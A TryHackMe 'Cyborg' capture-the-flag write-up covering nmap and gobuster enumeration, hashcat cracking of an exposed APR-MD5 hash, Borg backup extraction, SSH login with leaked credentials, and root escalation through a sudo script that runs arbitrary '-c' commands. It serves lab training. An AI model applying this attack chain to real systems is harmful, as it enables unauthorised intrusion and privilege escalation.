TryHackMe: Cyborg
Cyborg introduced me to a new approach on things and taught me that we don’t always know everything, and that won’t weight on our performance, what matters is what we do to get out of a situation that is new to us. What i notice in all these rooms is that it takes me more time to get inside the machines rather than getting the flags.
https://tryhackme.com/room/cyborgt8
Initial Enumeration
Nmap Scan
We start with our nmap scan:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap -T4 -n -sC -sV -Pn -p- 10.10.158.87
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-11 17:10 GMT
Nmap scan report for 10.10.158.87
Host is up (0.082s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 db:b2:70:f3:07:ac:32:00:3f:81:b8:d0:3a:89:f3:65 (RSA)
| 256 68:e6:85:2f:69:65:5b:e7:c6:31:2c:8e:41:67:d7:ba (ECDSA)
|_ 256 56:2c:79:92:ca:23:c3:91:49:35:fa:dd:69:7c:ca:ab (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 96.28 seconds
Web 80
Nothing much, so we proceed to port 80 web page:
Gobuster Scan
We get the default apache page and the source code doesn’t have anything for us, so we can go ahead and do our gobuster scan:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
┌──(kali㉿kali)-[~/Desktop]
└─$ gobuster dir -w /usr/share/wordlists/dirb/common.txt -x ".txt,.html,.php" -t 25 --timeout 20s -u http://10.10.158.87
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.158.87
[+] Method: GET
[+] Threads: 25
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: txt,html,php
[+] Timeout: 20s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
...
/admin (Status: 301) [Size: 312] [--> http://10.10.158.87/admin/]
/etc (Status: 301) [Size: 310] [--> http://10.10.158.87/etc/]
/index.html (Status: 200) [Size: 11321]
/index.html (Status: 200) [Size: 11321]
/server-status (Status: 403) [Size: 277]
Progress: 18456 / 18460 (99.98%)
===============================================================
Finished
===============================================================
Two directories:
- admin
- etc
We’ll start by checking the admin directory:
There are 2 interesting things that we found in the admin directory, the first being the Admins page with some chat logs:
And the other thing being an archive file that we download pressing the download option in the archive dropdown menu option:
Going to the other directory, etc, we find a folder called squid that inside has 2 files:
The squid.conf file didn’t have anything good but the passwd file had an hash:
To crack the hash we first need to know its type, to do so we will use the hash-identifier tool:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌──(kali㉿kali)-[~/Desktop/final_archive]
└─$ hash-identifier
#########################################################################
# __ __ __ ______ _____ #
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
# By Zion3R #
# www.Blackploit.com #
# Root@Blackploit.com #
#########################################################################
--------------------------------------------------
HASH: $apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.
Possible Hashs:
[+] MD5(APR)
--------------------------------------------------
Now we go to the hashcat hash types page and search for the MD5(APR):
After that, we just run hashcat and crack the hash:
1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(kali㉿kali)-[~/Desktop/final_archive]
└─$ hashcat -a 0 -m 1600 '$apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.' /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
...
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
$apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.:squidward
...
Borg Backup
We now have a password but nowhere really to use it, so we start looking around the archive file. And when opening it, we see the following:
After digging around the files most of them are encrypted except README that has written that the folders are part of a Borg Backup repository:
1
2
This is a Borg Backup repository.
See https://borgbackup.readthedocs.io/
The first step to go any further now is to install the borgbackup package, found in their website, then we just need to follow the Quick Start page from the documentation, and since the creation steps were already made, we could start by listing the archives inside the repository:
1
2
3
4
┌──(kali㉿kali)-[~/Desktop]
└─$ borg list final_archive
Enter passphrase for key /home/kali/Desktop/final_archive:
music_archive Tue, 2020-12-29 14:00:38 [f789ddb6b0ec108d130d16adebf5713c29faf19c44cad5e1eeb8ba37277b1c82]
And we see the music_archive from before that we cracked its hash, and following the steps we see that we can extract everything from the archive:
And when we do it, it asks for a password, so we put the password we got from the hash:
1
2
3
┌──(kali㉿kali)-[~/Desktop]
└─$ borg extract final_archive::music_archive
Enter passphrase for key /home/kali/Desktop/final_archive:
Shell as alex
It created a folder called home and the user alex inside:
1
2
3
┌──(kali㉿kali)-[~/Desktop/home/alex]
└─$ ls
Desktop Documents Downloads Music Pictures Public Templates Videos
Digging around, we find the credentials of alex for ssh:
1
2
3
4
5
┌──(kali㉿kali)-[~/Desktop/home/alex]
└─$ cat Documents/note.txt
Wow I'm awful at remembering Passwords so I've taken my Friends advice and noting them down!
alex:S3cretP@s3
We can now log into alex’s machine and read the user flag:
1
2
3
4
5
6
7
┌──(kali㉿kali)-[~/Desktop]
└─$ ssh alex@10.10.158.87
alex@10.10.158.87's password:
alex@ubuntu:~$ ls
Desktop Documents Downloads Music Pictures Public Templates user.txt Videos
alex@ubuntu:~$ cat user.txt
flag{REDACTED}
While enumerating, we see that we have sudo rights to run a file called backup.sh:
1
2
3
4
5
6
alex@ubuntu:~$ sudo -l
Matching Defaults entries for alex on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User alex may run the following commands on ubuntu:
(ALL : ALL) NOPASSWD: /etc/mp3backups/backup.sh
We also have read permissions, so we check the file to see what it does, and we find 2 interesting code parts, the first being:
1
2
3
4
5
6
while getopts c: flag
do
case "${flag}" in
c) command=${OPTARG};;
esac
done
And the other being:
1
2
cmd=$($command)
echo $cmd
This means that we can send any command through a ‘-c’ option, and it executes it. Doing a simple whoami just to test it out, we see that it run as root:
1
2
3
4
5
6
alex@ubuntu:/etc/mp3backups$ sudo ./backup.sh -c 'whoami'
...
Backup finished
root
To get the root flag we don’t even need root shell, a simple cat command will work just fine:
1
2
3
4
5
alex@ubuntu:/etc/mp3backups$ sudo ./backup.sh -c 'cat /root/root.txt'
...
Backup finished
flag{REDACTED}